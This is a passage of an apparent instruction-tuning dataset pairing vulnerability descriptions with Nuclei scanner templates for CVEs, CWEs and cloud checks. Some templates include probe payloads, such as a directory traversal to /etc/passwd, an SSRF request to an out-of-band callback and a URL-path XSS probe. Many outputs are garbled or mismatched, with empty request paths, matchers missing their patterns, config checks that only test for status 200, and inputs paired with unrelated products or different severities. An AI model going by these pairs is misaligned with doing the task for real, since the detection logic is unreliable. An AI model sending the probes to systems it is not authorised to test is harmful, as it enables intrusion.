other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware\nIndicators: error, vulnerability detected", "output": "id: vmware-hcx-log4j-rce\n\ninfo:\n name: VMware HCX - Remote Code Execution (Apache Log4j)\n author: pussycat0x,DhiyaneshDK\n severity: critical\n description: VMware HCX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2021-44228"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: resumes-actorsaccess\n\ninfo:\n name: Resumes actorsaccess User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Resumes actorsaccess user name information check was conducted.\n tags: osint,osint-social,resumes-actorsaccess,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://resumes.actorsaccess.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"- Resume | Actors Access\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-3374", "input": "Title: Path Traversal in rstudio shiny_server\nSummary: Directory traversal in RStudio Shiny Server before 1.5.16 allows attackers to read the application source code, involving an encoded slash.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: rstudio shiny_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-3374\n\ninfo:\n name: Rstudio Shiny Server <1.5.16 - Local File Inclusion\n author: geeknik\n severity: medium\n description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.\n tags: cve2021,cve,rstudio,traversal,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2f/\" \n - \"{{BaseURL}}/sample-apps/hello/%2f/\" \n matchers:\n - type: word\n words:\n - \"Index of /\" \n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-3374"} {"instruction": "Generate a Nuclei template for: Log Planner Stats Enabled in PostgreSQL Database Instances", "input": "Title: Log Planner Stats Enabled in PostgreSQL Database Instances\nSummary: Log Planner Stats Enabled in PostgreSQL Database Instances. Ensure that the log_planner_stats database flag is disabled for your Google Cloud PostgreSQL database instances in order to avoid performance issues caused by excessive logging. The log_planner_stats flag controls the inclusion of PostgreSQL planner performance statistics in the PostgreSQL logs for each query.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-pg-log-planner-stats-enabled\n\ninfo:\n name: Log Planner Stats Enabled in PostgreSQL Database Instances\n author: princechaddha\n severity: medium\n description: Ensure that the log_planner_stats database flag is disabled for your Google Cloud PostgreSQL database instances in order to avoid performance issues caused by excessive logging. The log_planner_stats flag controls the inclusion of PostgreSQL planner performance statistics in the PostgreSQL logs for each query.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,postgresql,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-pg-log-planner-stats-enabled"} {"instruction": "Generate a Nuclei template for: Uberflip Takeover Detection", "input": "Title: Uberflip Takeover Detection\nSummary: Uberflip Takeover Detection. Uberflip takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: uberflip-takeover\n\ninfo:\n name: Uberflip Takeover Detection\n author: pdteam\n severity: high\n description: Uberflip takeover was detected.\n tags: takeover,uberflip,hackerone,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"Non-hub domain, The URL you've accessed does not provide a hub.\"", "category": "generic", "severity": "high", "id": "uberflip-takeover"} {"instruction": "Generate a Nuclei template for CVE-2023-47246", "input": "Title: Path Traversal in sysaid sysaid\nSummary: In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: sysaid sysaid\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-47246\n\ninfo:\n name: SysAid Server - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2023-47246"} {"instruction": "Generate a Nuclei template for: WordPress Importer Detection", "input": "Title: WordPress Importer Detection\nSummary: WordPress Importer Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wordpress-importer\n\ninfo:\n name: WordPress Importer Detection\n author: ricardomaia\n severity: info\n description: WordPress Importer Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wordpress-importer"} {"instruction": "Generate a Nuclei template for: Wordpress - Path Disclosure", "input": "Title: Wordpress - Path Disclosure\nSummary: Wordpress - Path Disclosure. Wordpress internal file system path of a WordPress installation is exposed or disclosed to unauthorized users.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wp-full-path-disclosure\n\ninfo:\n name: Wordpress - Path Disclosure\n author: arcc\n severity: info\n description: Wordpress internal file system path of a WordPress installation is exposed or disclosed to unauthorized users.\n tags: debug,wordpress,fpd,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-includes/rss-functions.php\" \n matchers:\n - type: word\n words:\n - \"Call to undefined function _deprecated_file()\" \n part: body", "category": "generic", "severity": "info", "id": "wp-full-path-disclosure"} {"instruction": "Generate a Nuclei template for: Use AWS-managed policy to access Amazon ECR Repositories", "input": "Title: Use AWS-managed policy to access Amazon ECR Repositories\nSummary: Use AWS-managed policy to access Amazon ECR Repositories. Ensure that all EKS cluster node groups use the \"AmazonEC2ContainerRegistryReadOnly\" managed policy to access Amazon ECR repositories. This policy provides read-only access to Amazon EC2 Container Registry (ECR) repositories.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: eks-managed-policy-ecr-access\n\ninfo:\n name: Use AWS-managed policy to access Amazon ECR Repositories\n author: princechaddha\n severity: high\n description: Ensure that all EKS cluster node groups use the \"AmazonEC2ContainerRegistryReadOnly\" managed policy to access Amazon ECR repositories. This policy provides read-only access to Amazon EC2 Container Registry (ECR) repositories.\n tags: cloud,devops,aws,amazon,eks,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "eks-managed-policy-ecr-access"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: stackstorm-default-login\n\ninfo:\n name: StackStorm Default Login\n author: PaperPen\n severity: high\n description: A StackStorm default admin login was discovered.\n tags: stackstorm,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"user\":\" \n - \"\"token\":\" \n - \"\"expiry\":\" \n condition: and\n - type: status\n status:\n - 201", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: Azure App Service TLS Latest Version Not Configured", "input": "Title: Azure App Service TLS Latest Version Not Configured\nSummary: Azure App Service TLS Latest Version Not Configured. Ensure that all Microsoft Azure App Service web applications are using the latest version of TLS encryption protocol to secure the applications traffic over the Internet and comply with the industry standards. This check verifies if the minimum TLS version configured is not \"1.2\", indicating that the latest version of TLS is not used.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-appservice-tls-latest-version-missing\n\ninfo:\n name: Azure App Service TLS Latest Version Not Configured\n author: princechaddha\n severity: medium\n description: Ensure that all Microsoft Azure App Service web applications are using the latest version of TLS encryption protocol to secure the applications traffic over the Internet and comply with the industry standards. This check verifies if the minimum TLS version configured is not \"1.2\", indicating that the latest version of TLS is not used.\n tags: cloud,devops,azure,microsoft,appservice,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-appservice-tls-latest-version-missing"} {"instruction": "Generate a Nuclei template for CVE-2021-25297", "input": "Title: OS Command Injection in nagios nagios_xi\nSummary: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\nVulnerability Type: OS Command Injection\nSeverity: high\nAffected Products: nagios nagios_xi\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25297\n\ninfo:\n name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Ping\" \n - \"Switch Details\" \n part: body_4\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-25297"} {"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: php-zerodium-backdoor-rce\n\ninfo:\n name: PHP 8.1.0-dev - Backdoor Remote Code Execution\n author: dhiyaneshDk\n severity: critical\n description: PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.\n tags: php,backdoor,rce,zerodium,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"int(77777355556)\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-77"} {"instruction": "Generate a Nuclei template for CVE-2022-27849", "input": "Title: Information Disclosure in plugin-planet simple_ajax_chat\nSummary: Sensitive Information Disclosure (sac-export.csv) in Simple Ajax Chat (WordPress plugin) <= 20220115\nVulnerability Type: Information Disclosure\nSeverity: medium\nAffected Products: plugin-planet simple_ajax_chat\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-27849\n\ninfo:\n name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability\n author: random-robbie\n severity: high\n description: WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv\" \n matchers:\n - type: word\n words:\n - \"\"Chat Log\"\" \n - \"\"User IP\"\" \n - \"\"User ID\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/csv\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-27849"} {"instruction": "Generate a Nuclei template for: T-Pot Honeypot - Detect", "input": "Title: T-Pot Honeypot - Detect\nSummary: T-Pot Honeypot - Detect. A tpot dashboard has been detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tpot-honeypot-detect\n\ninfo:\n name: T-Pot Honeypot - Detect\n author: rxerium\n severity: info\n description: A tpot dashboard has been detected\n tags: tpot,honeypot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"T-Pot\" \n - \"T-Pot @ Github\" \n - \"T-Pot ReadMe\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "tpot-honeypot-detect"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: qmail-admin-login\n\ninfo:\n name: QmailAdmin Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: QmailAdmin login panel was detected.\n tags: qmail,panel,qmail_project,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/qmailadmin/qmailadmin.cgi\" \n - \"{{BaseURL}}/cgi-bin/qmailadmin/qmailadmin\" \n - \"{{BaseURL}}/cgi-bin/qmailadmin\" \n - \"{{BaseURL}}/cgi-ssl/qmailadmin/qmailadmin\" \n matchers:\n - type: word\n words:\n - \"QmailAdmin\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cisco-webvpn-detect\n\ninfo:\n name: Cisco WebVPN Panel - Detect\n author: ricardomaia\n severity: info\n description: Cisco WebVPN panel was detected.\n tags: panel,cisco,vpn,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/webvpn.html\" \n matchers:\n - type: word\n words:\n - \"CISCO\" \n - \"AnyConnect\" \n - \"SSLVPN Service\" \n part: body\n condition: or\n - type: regex\n part: header\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-24260", "input": "Title: SQL Injection in voipmonitor voipmonitor\nSummary: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: voipmonitor voipmonitor\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24260\n\ninfo:\n name: VoipMonitor - Pre-Auth SQL Injection\n author: gy741\n severity: critical\n description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.\n tags: cve,cve2022,voipmonitor,sqli,unauth,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"success\":true\" \n - \"_vm_version\" \n - \"_debug\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-24260"} {"instruction": "Generate a Nuclei template for: aws-ecs-container-agent-tasks", "input": "Title: aws-ecs-container-agent-tasks\nSummary: aws-ecs-container-agent-tasks. Aws container metadata content\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: aws-ecs-container-agent-tasks\n\ninfo:\n name: aws-ecs-container-agent-tasks\n author: dogasantos\n severity: info\n description: Aws container metadata content\n tags: miscellaneous,aws,docker,ec2,misc,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/v1/metadata\" \n - \"{{BaseURL}}/v1/tasks\" \n matchers:\n - type: word\n words:\n - \"arn:aws:ecs\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "aws-ecs-container-agent-tasks"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Amazon Media", "input": "Title: Content-Security-Policy Bypass - Amazon Media\nSummary: Content-Security-Policy Bypass - Amazon Media. Tags: xss, csp-bypass, amazon-media\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: amazon-media-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Amazon Media\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Amazon Media\n tags: xss,csp-bypass,amazon-media,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"amazon.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "amazon-media-csp-bypass"} {"instruction": "Generate a Nuclei template for: IRISNext Login Panel - Detect", "input": "Title: IRISNext Login Panel - Detect\nSummary: IRISNext Login Panel - Detect. IRISNext products was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: irisnext-panel\n\ninfo:\n name: IRISNext Login Panel - Detect\n author: righettod\n severity: info\n description: IRISNext products was detected.\n tags: panel,irisnext,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dblang.dcw\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "irisnext-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dibiz\n\ninfo:\n name: DIBIZ User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: DIBIZ user name information check was conducted.\n tags: osint,osint-business,dibiz,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.dibiz.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"mailto:?subject=\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-24354", "input": "Title: Vulnerability (CWE-918) in CVE-2025-24354\nSummary: imgproxy is server for resizing, processing, and converting images. Imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host. This vulnerability is fixed in 3.27.2.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-24354\n\ninfo:\n name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)\n author: oksuzkayra\n severity: medium\n description: imgproxy contains an issue caused by not blocking the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, letting local services be exposed, exploit requires network access.\n tags: cve,cve2025,imgproxy,ssrf,oast,oob\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-24354"} {"instruction": "Generate a Nuclei template for: ProFTPD Server Detect", "input": "Title: ProFTPD Server Detect\nSummary: ProFTPD Server Detect. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: proftpd-server-detect\n\ninfo:\n name: ProFTPD Server Detect\n author: pussycat0x\n severity: info\n description: The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.\n tags: network,ftp,proftpd,detect,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "proftpd-server-detect"} {"instruction": "Generate a Nuclei template for: aliexpress phishing Detection", "input": "Title: aliexpress phishing Detection\nSummary: aliexpress phishing Detection. An aliexpress phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: aliexpress-phish\n\ninfo:\n name: aliexpress phishing Detection\n author: rxerium\n severity: info\n description: An aliexpress phishing website was detected\n tags: phishing,aliexpress,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"AliExpress - Affordable Prices on Top Brands with Free Shipping\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "aliexpress-phish"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: digitalrebar-traversal\n\ninfo:\n name: Digital Rebar - Local File Inclusion\n author: c-sh0\n severity: high\n description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.\n tags: lfi,rackn,digitalrebar,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"X-Drp-Sha256sum:\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template for CVE-2024-57514", "input": "Title: Cross-Site Scripting (XSS) in CVE-2024-57514\nSummary: The TP-Link Archer A20 v3 router is vulnerable to Cross-site Scripting (XSS) due to improper handling of directory listing paths in the web interface. When a specially crafted URL is visited, the router's web page renders the directory listing and executes arbitrary JavaScript embedded in the URL. This allows the attacker to inject malicious code into the page, executing JavaScript on the victim's browser, which could then be used for further malicious actions. The vulnerability was identified in the 1.0.6 Build 20231011 rel.85717(5553) version.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-57514\n\ninfo:\n name: TP-Link Archer A20 v3 Router - Cross-site Scripting\n author: s4e-io\n severity: medium\n description: The TP-Link Archer A20 v3 router is vulnerable to Cross-site Scripting (XSS) due to improper handling of directory listing paths in the web interface. When a specially crafted URL is visited, the router's web page renders the directory listing and executes arbitrary JavaScript embedded in the URL. This allows the attacker to inject malicious code into the page, executing JavaScript on the victim's browser, which could then be used for further malicious actions. The vulnerability was identified in the 1.0.6 Build 20231011 rel.85717(5553) version.\n tags: cve,cve2024,tplink,router,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../..%2f\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-57514"} {"instruction": "Generate a Nuclei template for: Security Center Notifications - Disabled", "input": "Title: Security Center Notifications - Disabled\nSummary: Security Center Notifications - Disabled. Notifications for Alibaba Security Center are disabled, which may result in missed alerts for critical security events.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: security-notification-disabled\n\ninfo:\n name: Security Center Notifications - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Notifications for Alibaba Security Center are disabled, which may result in missed alerts for critical security events.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,security-center\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "security-notification-disabled"} {"instruction": "Generate a Nuclei template for CVE-2020-10189", "input": "Title: Deserialization of Untrusted Data in zohocorp manageengine_desktop_central\nSummary: Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: zohocorp manageengine_desktop_central\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-10189\n\ninfo:\n name: ManageEngine Desktop Central Java Deserialization\n author: king-alexander\n severity: critical\n description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.\n tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-10189"} {"instruction": "Generate a Nuclei template for: MantisBT Security Checks", "input": "Title: MantisBT Security Checks\nSummary: MantisBT Security Checks. A simple workflow that runs all MantisBT related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mantisbt-workflow\n\ninfo:\n name: MantisBT Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all MantisBT related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "mantisbt-workflow"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: securityspy-detect\n\ninfo:\n name: SecuritySpy Camera Panel - Detect\n author: pussycat0x\n severity: info\n description: SecuritySpy Camera panel was detected.\n tags: unauth,iot,securityspy,panel,camera,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"SecuritySpy\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: NIS+ Service Should Be Disabled", "input": "Title: NIS+ Service Should Be Disabled\nSummary: NIS+ Service Should Be Disabled. Evaluated the status of NIS+ service daemons on the system.Active NIS+ services could have permitted unauthorized users to escalate privileges or access sensitive account information, representing a significant security risk.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: linux-nisplus-service\n\ninfo:\n name: NIS+ Service Should Be Disabled\n author: songyaeji\n severity: high\n description: Evaluated the status of NIS+ service daemons on the system.Active NIS+ services could have permitted unauthorized users to escalate privileges or access sensitive account information, representing a significant security risk.\n tags: linux,local,audit,kisa,compliance\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "linux-nisplus-service"} {"instruction": "Generate a Nuclei template for: Redmine Login Panel - Detect", "input": "Title: Redmine Login Panel - Detect\nSummary: Redmine Login Panel - Detect. Redmine login panel was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: 